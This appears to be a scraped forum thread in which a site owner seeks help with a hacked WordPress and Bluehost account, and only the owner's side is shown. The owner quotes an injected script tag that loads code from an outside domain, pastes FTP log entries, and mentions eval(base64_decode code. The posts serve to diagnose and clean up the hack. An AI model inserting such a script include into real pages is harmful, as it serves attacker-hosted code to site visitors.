talia

Thanks

I did block the IP but this morning I found no evidence anyone had been in the ftp account according to the access logs but this

<script src=https://ez-paintinginc.com/lindy/index.php ></script>

has been inserted back into the html file

I don’t really understand a lot of the technical stuff. i’m just doing what I can until my tech person is available to work on it. Hopefully she’ll know how to set up the .htaccess file and other things to help protect my site

P.S. The strange thing is that I’ve been in on the ftp account but my IP address doesn’t show in the log

I found a log file for https://ftp.mydomain.com

It says it has been accessed by IP 216.97.230.50 which whois shows as being hosting company LunarPages. They are not my hosting company so there is no reason why anyone from there should be accessing my ftp account

OrgName: Lunar Pages
OrgID: ACIDL
Address: 100 East La Habra Blvd.
City: La Habra
StateProv: CA
PostalCode: 90631
Country: US

Here is a sample from the log

Fri Oct 23 15:50:34 2009 0 216.97.230.50 2029 /home2/mydomain/public_html/folder/wp-content/plugins/hello.php a _ o r mydomain ftp 1 * c
Fri Oct 23 15:50:34 2009 0 216.97.230.50 5663 /home2/mydomain/public_html/folder/wp-content/plugins/sidebarLogin.php a _ o r mydomain ftp 1 * c
Fri Oct 23 15:50:34 2009 0 216.97.230.50 31 /home2/mydomain/public_html/folder/wp-content/index.php a _ o r mydomain ftp 1 * c
Fri Oct 23 15:50:34 2009 0 216.97.230.50 1920 /home2/mydomain/public_html/folder/wp-content/index.php a _ i r mydomain ftp 1 * c
Fri Oct 23 15:50:35 2009 0 216.97.230.50 8635 /home2/mydomain/public_html/folder/wp-includes/js/autosave.js a _ o r mydomain ftp 1 * c
Fri Oct 23 15:50:35 2009 0 216.97.230.50 8720 /home2/mydomain/public_html/folder/wp-includes/js/autosave.js a _ i r mydomain ftp 1 * c
Fri Oct 23 15:50:35 2009 0 216.97.230.50 30316 /home2/mydomain/public_html/folder/wp-includes/js/colorpicker.js a _ o r mydomain ftp 1 * c
Fri Oct 23 15:50:35 2009 0 216.97.230.50 30401 /home2/mydomain/public_html/folder/wp-includes/js/colorpicker.js a _ i r mydomain ftp 1 * c
Fri Oct 23 15:50:35 2009 0 216.97.230.50 125339 /home2/mydomain/public_html/folder/wp-includes/js/prototype.js a _ o r mydomain ftp 1 * c
Fri Oct 23 15:50:36 2009 0 216.97.230.50 125424 /home2/mydomain/public_html/folder/wp-includes/js/prototype.js a _ i r mydomain ftp 1 * c
Fri Oct 23 15:50:36 2009 0 216.97.230.50 10850 /home2/mydomain/public_html/folder/wp-includes/js/quicktags.js a _ o r mydomain ftp 1

Could this be my hacker and is it safe to ban that IP? Any help appreciated

Thanks ??

Someone told me there is a way I can find the IP address of the hacker and block it. Anyone know how? And is it worth doing it? I figure they probably have rotating IP addresses anyway.

This keeps finding its way onto my html pages
<script src=https://ez-paintinginc.com/lindy/index.php ></script>

I hope visitors to my site aren’t getting some sort of trojan or something happening to their computers.

Ahhh! Thanks, that explains why the ez-painting site was blank.

It seems like the hackers have got into my html files and inserted scripts hosted at https://ez-paintinginc.com so the problem is bigger than I thought. I’ve deleted some of my websites, but I haven’t replaced them with new sites yet or restored wordpress. Getting there slowly

Does anyone know if https://ez-paintinginc.com is a hack or legitimate?

Thanks jonimueller and iridiax for the links ??

You don’t want to have to clean up hacked sites over and over.

Yes that was my fear. So if I understand you correctly I need to install the latest version of WP on ALL websites at the same time, or it will be able to hack into WP 2.8.4?

Is this domain reference https://ez-paintinginc.com anything to do with the hack? it seems to be on some of my html website but I can’t think how that reference got there? It appears to link to some sort of script and I am not sure if it’s another form of hack or something legit. I can’t find anything on it in google

Does anyone know if I need to remove all the websites at the same time or can progressively remove clean and then replace with the latest WP?

Lots of questions! If anyone can help I’d appreciate it

I’ve read the instructions on restoring the files and I’m good to go, however I’m wondering how to handle the issue of multiple websites.

I host with bluehost, and have multiple domains. Some wordpress, some aren’t but most are php based. They are all on the same ftp account. If I put a fresh site on there with the latest version of WP, will the hackers still be able to hack that, because they still have back door access to the other php files on the system?

i.e. can I progressively restore one domain at a time, or will they get hacked if I do that? do I need instead to clear out all the php based domains?

Also, I see that images aren’t usually hacked. What about pdf or mp3 files that I have online?

Will my html files in other domains be okay? They don’t seem to have been hacked even though they’re on the same ftp account.

Thanks!

The guys at blue host suggest changing the names of the scripts from php to html to make it harder for the hackers. Any thoughts on this idea?

My sites have already been hacked again. Very frustrating. I’m not very techie so it’s taking me a while to make the changes they suggest

excellent thanks for that

I’ve worked out which files to remove the eval(base64_decode code from and it seems to be working.

how likely is it that i’ll be hacked again soon? my tech person says she can’t look at it for 2 weeks to “harden” up the files. i’m wondering if i should hire someone else???

OK I guessed it must be. Thanks for the input. I just wish I knew where it came from

If I delete that part will it fix things? I managed to fix my basic (non wordpress) files by deleting that part of the code. But WP has more files and that code is probably in more places.

Any tips on how to get rid of it? I tried restoring my backup from a week ago but it doesn’t seem to be working. It’s weird as I only noticed the problem 3 days ago so I thought the backup from a week ago would be good.

Ok thanks Mike. your plugin is great. I just have to find something to replace first RSS so I can use it